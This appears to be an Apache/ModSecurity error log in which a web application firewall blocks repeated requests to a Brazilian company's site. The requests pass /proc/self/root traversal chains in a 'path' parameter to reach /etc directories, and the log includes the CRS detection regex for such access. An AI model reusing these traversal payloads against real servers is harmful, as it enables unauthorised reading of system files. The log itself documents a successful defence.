referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:54.990946 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:40744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjqta6ubjKNq_cu4aS8wAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:56.538096 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:40746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjrPu8EFLIOrSqIpv-BgAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:08:07.145867 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:38358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjt9Y0UrI5A3LftIyfcQAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:08:11.747890 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:40756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqju0zinOy1jxa1j4cOUwAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:08:15.082282 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.241.31:38558] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjv0zinOy1jxa1j4cOVgAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:08:17.370917 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:34132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjweyqAr6etmhZHNq4mwAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:08:23.105866 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.244.43:42658] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqjxuoXxyEfFpUF8f9nPwAAAU4"]
[Wed Mar 18 10:08:25.049798 2026] [mime_magic:error] [pid 11816:tid 140411708356352] (70014)End of file found: [client 57.141.18.85:41198] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:08:28.943804 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.228.61:56200] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqjzOyqAr6etmhZHNq4pwAAAFM"]
[Wed Mar 18 10:09:05.088473 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:34134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqj8ew_le52K8_3pV3ZWAAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:06.555381 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:39166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqj8ta6ubjKNq_cu4aTGQAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:12.554993 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:39182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqj-NY0UrI5A3LftIyfowAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:14.863436 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:44150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqj-dY0UrI5A3LftIyfpgAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:18.413260 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:44160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqj_tY0UrI5A3LftIyfsgAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:19.718245 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:51356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqj_9a6ubjKNq_cu4aTHAAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:24.565699 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:51366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkA-yqAr6etmhZHNq42wAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:26.026073 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:51372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkBimAPhZkrhU8w4lmkgAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:31.714941 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.243.128:51376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkC0zinOy1jxa1j4cOkQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:33.046890 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:39814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkDew_le52K8_3pV3ZawAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:39.309915 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:39826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkE-yqAr6etmhZHNq4-AAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:42.287595 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:38656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkFuyqAr6etmhZHNq4_gAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:44.619315 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:38664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkGAkwaGbbGflqUZAJowAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:45.996026 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:38672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkGdY0UrI5A3LftIyfzQAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
